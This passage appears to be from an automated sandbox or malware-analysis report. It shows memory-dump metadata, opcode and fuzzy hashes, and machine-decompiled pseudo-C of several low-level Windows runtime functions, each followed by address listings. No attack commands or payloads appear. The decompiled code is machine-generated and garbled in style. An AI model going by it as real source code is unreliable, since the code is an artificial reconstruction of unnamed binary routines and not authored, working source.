                        0x02ba76b5
                        0x02ba76ba
                        0x02ba76bc
                        0x02ba76bc
                        0x02ba76c0
                        0x00000000
                        0x02ba76c2
                        0x02ba76ce
                        0x02ba76ce
                        0x02ba76c0
                        0x02ba76b1
                        0x02ba76a8
                        0x02ba7697
                        0x02ba76d9

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                        • Instruction ID: 3abc62b562c28cf965c5fd6b196388bf3c645538884e65584f7b6cb0b274f7a3
                        • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                        • Instruction Fuzzy Hash: C2018432718519ABC7209E6EDC61F6FB7AEEB84760B2445E4B909CB251DE30DD01E7A0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 69%
                        			E02B99080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                        				intOrPtr* _t51;
                        				intOrPtr _t59;
                        				signed int _t64;
                        				signed int _t67;
                        				signed int* _t71;
                        				signed int _t74;
                        				signed int _t77;
                        				signed int _t82;
                        				intOrPtr* _t84;
                        				void* _t85;
                        				intOrPtr* _t87;
                        				void* _t94;
                        				signed int _t95;
                        				intOrPtr* _t97;
                        				signed int _t99;
                        				signed int _t102;
                        				void* _t104;
                        
                        				_push(__ebx);
                        				_push(__esi);
                        				_push(__edi);
                        				_t97 = __ecx;
                        				_t102 =  *(__ecx + 0x14);
                        				if((_t102 & 0x02ffffff) == 0x2000000) {
                        					_t102 = _t102 | 0x000007d0;
                        				}
                        				_t48 =  *[fs:0x30];
                        				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                        					_t102 = _t102 & 0xff000000;
                        				}
                        				_t80 = 0x2c885ec;
                        				E02BB2280(_t48, 0x2c885ec);
                        				_t51 =  *_t97 + 8;
                        				if( *_t51 != 0) {
                        					L6:
                        					return E02BAFFB0(_t80, _t97, _t80);
                        				} else {
                        					 *(_t97 + 0x14) = _t102;
                        					_t84 =  *0x2c8538c; // 0x77ad6888
                        					if( *_t84 != 0x2c85388) {
                        						_t85 = 3;
                        						asm("int 0x29");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						_push(0x2c);
                        						_push(0x2c6f6e8);
                        						E02BED0E8(0x2c885ec, _t97, _t102);
                        						 *((char*)(_t104 - 0x1d)) = 0;
                        						_t99 =  *(_t104 + 8);
                        						__eflags = _t99;
                        						if(_t99 == 0) {
                        							L13:
                        							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                        							if(__eflags == 0) {
                        								E02C688F5(_t80, _t85, 0x2c85388, _t99, _t102, __eflags);
                        							}
                        						} else {
                        							__eflags = _t99 -  *0x2c886c0; // 0x27307b0
                        							if(__eflags == 0) {
                        								goto L13;
                        							} else {
                        								__eflags = _t99 -  *0x2c886b8; // 0x0
                        								if(__eflags == 0) {
                        									goto L13;
                        								} else {
                        									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                        									__eflags =  *((char*)(_t59 + 0x28));
                        									if( *((char*)(_t59 + 0x28)) == 0) {
                        										E02BB2280(_t99 + 0xe0, _t99 + 0xe0);
                        										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                        										__eflags =  *((char*)(_t99 + 0xe5));
                        										if(__eflags != 0) {
                        											E02C688F5(0x2c885ec, _t85, 0x2c85388, _t99, _t102, __eflags);
                        										} else {
                        											__eflags =  *((char*)(_t99 + 0xe4));
                        											if( *((char*)(_t99 + 0xe4)) == 0) {
                        												 *((char*)(_t99 + 0xe4)) = 1;
                        												_push(_t99);
                        												_push( *((intOrPtr*)(_t99 + 0x24)));
                        												E02BDAFD0();
                        											}
                        											while(1) {
                        												_t71 = _t99 + 8;
                        												 *(_t104 - 0x2c) = _t71;
                        												_t80 =  *_t71;
                        												_t95 = _t71[1];
                        												 *(_t104 - 0x28) = _t80;
                        												 *(_t104 - 0x24) = _t95;
                        												while(1) {
                        													L19:
                        													__eflags = _t95;
                        													if(_t95 == 0) {
                        														break;
                        													}
                        													_t102 = _t80;
                        													 *(_t104 - 0x30) = _t95;
                        													 *(_t104 - 0x24) = _t95 - 1;
                        													asm("lock cmpxchg8b [edi]");
                        													_t80 = _t102;
                        													 *(_t104 - 0x28) = _t80;
                        													 *(_t104 - 0x24) = _t95;
                        													__eflags = _t80 - _t102;
                        													_t99 =  *(_t104 + 8);
                        													if(_t80 != _t102) {
                        														continue;
                        													} else {
                        														__eflags = _t95 -  *(_t104 - 0x30);
                        														if(_t95 !=  *(_t104 - 0x30)) {
                        															continue;
                        														} else {
                        															__eflags = _t95;
                        															if(_t95 != 0) {
                        																_t74 = 0;
                        																 *(_t104 - 0x34) = 0;
                        																_t102 = 0;
                        																__eflags = 0;
                        																while(1) {
                        																	 *(_t104 - 0x3c) = _t102;
                        																	__eflags = _t102 - 3;
                        																	if(_t102 >= 3) {
                        																		break;
                        																	}
                        																	__eflags = _t74;
                        																	if(_t74 != 0) {
                        																		L49:
                        																		_t102 =  *_t74;
                        																		__eflags = _t102;
                        																		if(_t102 != 0) {
                        																			_t102 =  *(_t102 + 4);
                        																			__eflags = _t102;
                        																			if(_t102 != 0) {
                        																				 *0x2c8b1e0(_t74, _t99);
                        																				 *_t102();
                        																			}
                        																		}
                        																		do {
                        																			_t71 = _t99 + 8;
                        																			 *(_t104 - 0x2c) = _t71;
                        																			_t80 =  *_t71;
                        																			_t95 = _t71[1];
                        																			 *(_t104 - 0x28) = _t80;
                        																			 *(_t104 - 0x24) = _t95;
                        																			goto L19;
                        																		} while (_t74 == 0);
                        																		goto L49;
                        																	} else {
                        																		_t82 = 0;
                        																		__eflags = 0;
                        																		while(1) {
                        																			 *(_t104 - 0x38) = _t82;
                        																			__eflags = _t82 -  *0x2c884c0;
                        																			if(_t82 >=  *0x2c884c0) {
                        																				break;
                        																			}
                        																			__eflags = _t74;
                        																			if(_t74 == 0) {
                        																				_t77 = E02C69063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                        																				__eflags = _t77;
                        																				if(_t77 == 0) {
                        																					_t74 = 0;
                        																					__eflags = 0;
                        																				} else {
                        																					_t74 = _t77 + 0xfffffff4;
                        																				}
                        																				 *(_t104 - 0x34) = _t74;
                        																				_t82 = _t82 + 1;
                        																				continue;
                        																			}
                        																			break;
                        																		}
                        																		_t102 = _t102 + 1;
                        																		continue;
                        																	}
                        																	goto L20;
                        																}
                        																__eflags = _t74;
                        															}
                        														}
                        													}
                        													break;
                        												}
                        												L20:
                        												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                        												 *((char*)(_t99 + 0xe5)) = 1;
                        												 *((char*)(_t104 - 0x1d)) = 1;
                        												goto L21;
                        											}
                        										}
                        										L21:
                        										 *(_t104 - 4) = 0xfffffffe;
                        										E02B9922A(_t99);
                        										_t64 = E02BB7D50();
                        										__eflags = _t64;
                        										if(_t64 != 0) {
                        											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        										} else {
                        											_t67 = 0x7ffe0386;
                        										}
                        										__eflags =  *_t67;
                        										if( *_t67 != 0) {
                        											_t67 = E02C68B58(_t99);
                        										}
                        										__eflags =  *((char*)(_t104 - 0x1d));
                        										if( *((char*)(_t104 - 0x1d)) != 0) {
                        											__eflags = _t99 -  *0x2c886c0; // 0x27307b0
                        											if(__eflags != 0) {
                        												__eflags = _t99 -  *0x2c886b8; // 0x0
                        												if(__eflags == 0) {
                        													_t94 = 0x2c886bc;
                        													_t87 = 0x2c886b8;
                        													goto L27;
                        												} else {
                        													__eflags = _t67 | 0xffffffff;
                        													asm("lock xadd [edi], eax");
                        													if(__eflags == 0) {
                        														E02B99240(_t80, _t99, _t99, _t102, __eflags);
                        													}
                        												}
                        											} else {
                        												_t94 = 0x2c886c4;
                        												_t87 = 0x2c886c0;
                        												L27:
                        												E02BC9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                        											}
                        										}
                        									} else {
                        										goto L13;
                        									}
                        								}
                        							}
                        						}
                        						return E02BED130(_t80, _t99, _t102);
                        					} else {
                        						 *_t51 = 0x2c85388;
                        						 *((intOrPtr*)(_t51 + 4)) = _t84;
                        						 *_t84 = _t51;
                        						 *0x2c8538c = _t51;
                        						goto L6;
                        					}
                        				}
                        			}




















                        0x02b99082
                        0x02b99083
                        0x02b99084
                        0x02b99085
                        0x02b99087
                        0x02b99096
                        0x02b99098
                        0x02b99098
                        0x02b9909e
                        0x02b990a8
                        0x02b990e7
                        0x02b990e7
                        0x02b990aa
                        0x02b990b0
                        0x02b990b7
                        0x02b990bd
                        0x02b990dd
                        0x02b990e6
                        0x02b990bf
                        0x02b990bf
                        0x02b990c7
                        0x02b990cf
                        0x02b990f1
                        0x02b990f2
                        0x02b990f4
                        0x02b990f5
                        0x02b990f6
                        0x02b990f7
                        0x02b990f8
                        0x02b990f9
                        0x02b990fa
                        0x02b990fb
                        0x02b990fc
                        0x02b990fd
                        0x02b990fe
                        0x02b990ff
                        0x02b99100
                        0x02b99102
                        0x02b99107
                        0x02b9910c
                        0x02b99110
                        0x02b99113
                        0x02b99115
                        0x02b99136
                        0x02b9913f
                        0x02b99143
                        0x02bf37e4
                        0x02bf37e4
                        0x02b99117
                        0x02b99117
                        0x02b9911d
                        0x00000000
                        0x02b9911f
                        0x02b9911f
                        0x02b99125
                        0x00000000
                        0x02b99127
                        0x02b9912d
                        0x02b99130
                        0x02b99134
                        0x02b99158
                        0x02b9915d
                        0x02b99161
                        0x02b99168
                        0x02bf3715
                        0x02b9916e
                        0x02b9916e
                        0x02b99175
                        0x02b99177
                        0x02b9917e
                        0x02b9917f
                        0x02b99182
                        0x02b99182
                        0x02b99187
                        0x02b99187
                        0x02b9918a
                        0x02b9918d
                        0x02b9918f
                        0x02b99192
                        0x02b99195
                        0x02b99198
                        0x02b99198
                        0x02b99198
                        0x02b9919a
                        0x00000000
                        0x00000000
                        0x02bf371f
                        0x02bf3721
                        0x02bf3727
                        0x02bf372f
                        0x02bf3733
                        0x02bf3735
                        0x02bf3738
                        0x02bf373b
                        0x02bf373d
                        0x02bf3740
                        0x00000000
                        0x02bf3746
                        0x02bf3746
                        0x02bf3749
                        0x00000000
                        0x02bf374f
                        0x02bf374f
                        0x02bf3751
                        0x02bf3757
                        0x02bf3759
                        0x02bf375c
                        0x02bf375c
                        0x02bf375e
                        0x02bf375e
                        0x02bf3761
                        0x02bf3764
                        0x00000000
                        0x00000000
                        0x02bf3766
                        0x02bf3768
                        0x02bf37a3
                        0x02bf37a3
                        0x02bf37a5
                        0x02bf37a7
                        0x02bf37ad
                        0x02bf37b0
                        0x02bf37b2
                        0x02bf37bc
                        0x02bf37c2
                        0x02bf37c2
                        0x02bf37b2
                        0x02b99187
                        0x02b99187
                        0x02b9918a
                        0x02b9918d
                        0x02b9918f
                        0x02b99192
                        0x02b99195
                        0x00000000
                        0x02b99195
                        0x00000000
                        0x02bf376a
                        0x02bf376a
                        0x02bf376a
                        0x02bf376c
                        0x02bf376c
                        0x02bf376f
                        0x02bf3775
                        0x00000000
                        0x00000000
                        0x02bf3777
                        0x02bf3779
                        0x02bf3782
                        0x02bf3787
                        0x02bf3789
                        0x02bf3790
                        0x02bf3790
                        0x02bf378b
                        0x02bf378b
                        0x02bf378b
                        0x02bf3792
                        0x02bf3795
                        0x00000000
                        0x02bf3795
                        0x00000000
                        0x02bf3779
                        0x02bf3798
                        0x00000000
                        0x02bf3798
                        0x00000000
                        0x02bf3768
                        0x02bf379b
                        0x02bf379b
                        0x02bf3751
                        0x02bf3749
                        0x00000000
                        0x02bf3740
                        0x02b991a0
                        0x02b991a3
                        0x02b991a9
                        0x02b991b0
                        0x00000000
                        0x02b991b0
                        0x02b99187
                        0x02b991b4
                        0x02b991b4
                        0x02b991bb
                        0x02b991c0
                        0x02b991c5
                        0x02b991c7
                        0x02bf37da
                        0x02b991cd
                        0x02b991cd
                        0x02b991cd
                        0x02b991d2
                        0x02b991d5
                        0x02b99239
                        0x02b99239
                        0x02b991d7
                        0x02b991db
                        0x02b991e1
                        0x02b991e7
                        0x02b991fd
                        0x02b99203
                        0x02b9921e
                        0x02b99223
                        0x00000000
                        0x02b99205
                        0x02b99205
                        0x02b99208
                        0x02b9920c
                        0x02b99214
                        0x02b99214
                        0x02b9920c
                        0x02b991e9
                        0x02b991e9
                        0x02b991ee
                        0x02b991f3
                        0x02b991f3
                        0x02b991f3
                        0x02b991e7
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b99134
                        0x02b99125
                        0x02b9911d
                        0x02b9914e
                        0x02b990d1
                        0x02b990d1
                        0x02b990d3
                        0x02b990d6
                        0x02b990d8
                        0x00000000
                        0x02b990d8
                        0x02b990cf

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0097b6c20a0e95fdfafc57c42def5b46ef30d7b5db7747d944f9cb8a4db71242
                        • Instruction ID: 05371ce7b1ce098eaaa692cab2af48fe9398ca733691c462ce91eef2d5bc643d
                        • Opcode Fuzzy Hash: 0097b6c20a0e95fdfafc57c42def5b46ef30d7b5db7747d944f9cb8a4db71242
                        • Instruction Fuzzy Hash: F301F4B2901A148FC7199F04D840B227BA9EF41324F2281BAE515CB691C3B1DC41CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 46%
                        			E02C2C450(intOrPtr* _a4) {
                        				signed char _t25;
                        				intOrPtr* _t26;
                        				intOrPtr* _t27;
                        
                        				_t26 = _a4;
                        				_t25 =  *(_t26 + 0x10);
                        				if((_t25 & 0x00000003) != 1) {
                        					_push(0);
                        					_push(0);
                        					_push(0);
                        					_push( *((intOrPtr*)(_t26 + 8)));
                        					_push(0);
                        					_push( *_t26);
                        					E02BD9910();
                        					_t25 =  *(_t26 + 0x10);
                        				}
                        				if((_t25 & 0x00000001) != 0) {
                        					_push(4);
                        					_t7 = _t26 + 4; // 0x4
                        					_t27 = _t7;
                        					_push(_t27);
                        					_push(5);
                        					_push(0xfffffffe);
                        					E02BD95B0();
                        					if( *_t27 != 0) {
                        						_push( *_t27);
                        						E02BD95D0();
                        					}
                        				}
                        				_t8 = _t26 + 0x14; // 0x14
                        				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                        					L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                        				}
                        				_push( *_t26);
                        				E02BD95D0();
                        				return L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                        			}






                        0x02c2c458
                        0x02c2c45d
                        0x02c2c466
                        0x02c2c468
                        0x02c2c469
                        0x02c2c46a
                        0x02c2c46b
                        0x02c2c46e
                        0x02c2c46f
                        0x02c2c471
                        0x02c2c476
                        0x02c2c476
                        0x02c2c47c
                        0x02c2c47e
                        0x02c2c480
                        0x02c2c480
                        0x02c2c483
                        0x02c2c484
                        0x02c2c486
                        0x02c2c488
                        0x02c2c48f
                        0x02c2c491
                        0x02c2c493
                        0x02c2c493
                        0x02c2c48f
                        0x02c2c498
                        0x02c2c49e
                        0x02c2c4ad
                        0x02c2c4ad
                        0x02c2c4b2
                        0x02c2c4b4
                        0x02c2c4cd

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                        • Instruction ID: 706d16c9203c5d288a18505c450b97b0c6ee20b4aef5e53d1bb77135ada60dc8
                        • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                        • Instruction Fuzzy Hash: BE019E72140A15BFD721AF65CC80EB7F76EFF94798F014526F21446560DB22ADA0CAA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 86%
                        			E02C64015(signed int __eax, signed int __ecx) {
                        				void* __ebx;
                        				void* __edi;
                        				signed char _t10;
                        				signed int _t28;
                        
                        				_push(__ecx);
                        				_t28 = __ecx;
                        				asm("lock xadd [edi+0x24], eax");
                        				_t10 = (__eax | 0xffffffff) - 1;
                        				if(_t10 == 0) {
                        					_t1 = _t28 + 0x1c; // 0x1e
                        					E02BB2280(_t10, _t1);
                        					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                        					E02BB2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x2c886ac);
                        					E02B9F900(0x2c886d4, _t28);
                        					E02BAFFB0(0x2c886ac, _t28, 0x2c886ac);
                        					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                        					E02BAFFB0(0, _t28, _t1);
                        					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                        					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                        						L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                        					}
                        					_t10 = L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                        				}
                        				return _t10;
                        			}







                        0x02c6401a
                        0x02c6401e
                        0x02c64023
                        0x02c64028
                        0x02c64029
                        0x02c6402b
                        0x02c6402f
                        0x02c64043
                        0x02c64046
                        0x02c64051
                        0x02c64057
                        0x02c6405f
                        0x02c64062
                        0x02c64067
                        0x02c6406f
                        0x02c6407c
                        0x02c6407c
                        0x02c6408c
                        0x02c6408c
                        0x02c64097

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 178e054d38f589a8e358d53b5aa795c87e203340b8a5924ac17057cc24eb52d4
                        • Instruction ID: a6274f7511dae5cbc04b4f24677a9f36987419fbfc4395b42e663af146a01afb
                        • Opcode Fuzzy Hash: 178e054d38f589a8e358d53b5aa795c87e203340b8a5924ac17057cc24eb52d4
                        • Instruction Fuzzy Hash: 4D01DF722419447FD625AB69CD80E63B7ADEF85760B000265F508C7E11CB65EC11CAE0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 61%
                        			E02C5138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                        				signed int _v8;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				short _v54;
                        				char _v60;
                        				void* __edi;
                        				void* __esi;
                        				signed char* _t21;
                        				intOrPtr _t27;
                        				intOrPtr _t33;
                        				intOrPtr _t34;
                        				signed int _t35;
                        
                        				_t32 = __edx;
                        				_t27 = __ebx;
                        				_v8 =  *0x2c8d360 ^ _t35;
                        				_t33 = __edx;
                        				_t34 = __ecx;
                        				E02BDFA60( &_v60, 0, 0x30);
                        				_v20 = _a4;
                        				_v16 = _a8;
                        				_v28 = _t34;
                        				_v24 = _t33;
                        				_v54 = 0x1033;
                        				if(E02BB7D50() == 0) {
                        					_t21 = 0x7ffe0388;
                        				} else {
                        					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        				}
                        				_push( &_v60);
                        				_push(0x10);
                        				_push(0x20402);
                        				_push( *_t21 & 0x000000ff);
                        				return E02BDB640(E02BD9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                        			}

















                        0x02c5138a
                        0x02c5138a
                        0x02c51399
                        0x02c513a3
                        0x02c513a8
                        0x02c513aa
                        0x02c513b5
                        0x02c513bb
                        0x02c513c3
                        0x02c513c6
                        0x02c513c9
                        0x02c513d4
                        0x02c513e6
                        0x02c513d6
                        0x02c513df
                        0x02c513df
                        0x02c513f1
                        0x02c513f2
                        0x02c513f4
                        0x02c513f9
                        0x02c5140e

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4c821ed759becff32825e0e3987911d49df8d9d45b13b322ed61a4468af70ef0
                        • Instruction ID: dc62fea73659ef8a4269f70a7d604790acd19e0012a13599836de4eba3f24939
                        • Opcode Fuzzy Hash: 4c821ed759becff32825e0e3987911d49df8d9d45b13b322ed61a4468af70ef0
                        • Instruction Fuzzy Hash: 23015271A04618AFCB14DFA9D845FAEB7B8EF44710F044166F915EB280EA74DA41CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 61%
                        			E02C514FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                        				signed int _v8;
                        				intOrPtr _v16;
                        				intOrPtr _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				short _v54;
                        				char _v60;
                        				void* __edi;
                        				void* __esi;
                        				signed char* _t21;
                        				intOrPtr _t27;
                        				intOrPtr _t33;
                        				intOrPtr _t34;
                        				signed int _t35;
                        
                        				_t32 = __edx;
                        				_t27 = __ebx;
                        				_v8 =  *0x2c8d360 ^ _t35;
                        				_t33 = __edx;
                        				_t34 = __ecx;
                        				E02BDFA60( &_v60, 0, 0x30);
                        				_v20 = _a4;
                        				_v16 = _a8;
                        				_v28 = _t34;
                        				_v24 = _t33;
                        				_v54 = 0x1034;
                        				if(E02BB7D50() == 0) {
                        					_t21 = 0x7ffe0388;
                        				} else {
                        					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                        				}
                        				_push( &_v60);
                        				_push(0x10);
                        				_push(0x20402);
                        				_push( *_t21 & 0x000000ff);
                        				return E02BDB640(E02BD9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                        			}

















                        0x02c514fb
                        0x02c514fb
                        0x02c5150a
                        0x02c51514
                        0x02c51519
                        0x02c5151b
                        0x02c51526
                        0x02c5152c
                        0x02c51534
                        0x02c51537
                        0x02c5153a
                        0x02c51545
                        0x02c51557
                        0x02c51547
                        0x02c51550
                        0x02c51550
                        0x02c51562
                        0x02c51563
                        0x02c51565
                        0x02c5156a
                        0x02c5157f

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3e87c68dbe314b85b9de3b8c9c75ff4679fd42d00fd661cd5a139db3e68ac9c3
                        • Instruction ID: ced787529234343feabe2741537644f72f91921861d57587e084913d4cea8845
                        • Opcode Fuzzy Hash: 3e87c68dbe314b85b9de3b8c9c75ff4679fd42d00fd661cd5a139db3e68ac9c3
                        • Instruction Fuzzy Hash: AD019271A01258AFCB04DFA9D845FEEB7B8EF44710F444056F915EB280EA70DA40CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 91%
                        			E02B958EC(intOrPtr __ecx) {
                        				signed int _v8;
                        				char _v28;
                        				char _v44;
                        				char _v76;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr _t10;
                        				intOrPtr _t16;
                        				intOrPtr _t17;
                        				intOrPtr _t27;
                        				intOrPtr _t28;
                        				signed int _t29;
                        
                        				_v8 =  *0x2c8d360 ^ _t29;
                        				_t10 =  *[fs:0x30];
                        				_t27 = __ecx;
                        				if(_t10 == 0) {
                        					L6:
                        					_t28 = 0x2b75c80;
                        				} else {
                        					_t16 =  *((intOrPtr*)(_t10 + 0x10));
                        					if(_t16 == 0) {
                        						goto L6;
                        					} else {
                        						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
                        					}
                        				}
                        				if(E02B95943() != 0 &&  *0x2c85320 > 5) {
                        					E02C17B5E( &_v44, _t27);
                        					_t22 =  &_v28;
                        					E02C17B5E( &_v28, _t28);
                        					_t11 = E02C17B9C(0x2c85320, 0x2b7bf15,  &_v28, _t22, 4,  &_v76);
                        				}
                        				return E02BDB640(_t11, _t17, _v8 ^ _t29, 0x2b7bf15, _t27, _t28);
                        			}















                        0x02b958fb
                        0x02b958fe
                        0x02b95906
                        0x02b9590a
                        0x02b9593c
                        0x02b9593c
                        0x02b9590c
                        0x02b9590c
                        0x02b95911
                        0x00000000
                        0x02b95913
                        0x02b95913
                        0x02b95913
                        0x02b95911
                        0x02b9591d
                        0x02bf1035
                        0x02bf103c
                        0x02bf103f
                        0x02bf1056
                        0x02bf1056
                        0x02b9593b

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 593012811992c48c3c1098e61d9e6baa22d95d015f8b9a6281f0def7f24050b8
                        • Instruction ID: 44a103463b347ef7e6604e510087351a113d6fbffff597a70d08a580d1eed225
                        • Opcode Fuzzy Hash: 593012811992c48c3c1098e61d9e6baa22d95d015f8b9a6281f0def7f24050b8
                        • Instruction Fuzzy Hash: F601D431A40108DFDB24EE39D801AAFB3A9EB84224FC540F9D905A7240DF30DD05CB50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BAB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                        				signed char _t11;
                        				signed char* _t12;
                        				intOrPtr _t24;
                        				signed short* _t25;
                        
                        				_t25 = __edx;
                        				_t24 = __ecx;
                        				_t11 = ( *[fs:0x30])[0x50];
                        				if(_t11 != 0) {
                        					if( *_t11 == 0) {
                        						goto L1;
                        					}
                        					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                        					L2:
                        					if( *_t12 != 0) {
                        						_t12 =  *[fs:0x30];
                        						if((_t12[0x240] & 0x00000004) == 0) {
                        							goto L3;
                        						}
                        						if(E02BB7D50() == 0) {
                        							_t12 = 0x7ffe0385;
                        						} else {
                        							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                        						}
                        						if(( *_t12 & 0x00000020) == 0) {
                        							goto L3;
                        						}
                        						return E02C17016(_a4, _t24, 0, 0, _t25, 0);
                        					}
                        					L3:
                        					return _t12;
                        				}
                        				L1:
                        				_t12 = 0x7ffe0384;
                        				goto L2;
                        			}







                        0x02bab037
                        0x02bab039
                        0x02bab03b
                        0x02bab040
                        0x02bfa60e
                        0x00000000
                        0x00000000
                        0x02bfa61d
                        0x02bab04b
                        0x02bab04e
                        0x02bfa627
                        0x02bfa634
                        0x00000000
                        0x00000000
                        0x02bfa641
                        0x02bfa653
                        0x02bfa643
                        0x02bfa64c
                        0x02bfa64c
                        0x02bfa65b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02bfa66c
                        0x02bab057
                        0x02bab057
                        0x02bab057
                        0x02bab046
                        0x02bab046
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                        • Instruction ID: bb86f2c8374ccfb1af61a7850fd167e67ab40d58c00dcc811df3ba8d21044a19
                        • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                        • Instruction Fuzzy Hash: 9B018F72204A80AFD33A871CC998F7677E8FB55758F0940E1FA29CBA91D778DC44C620
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
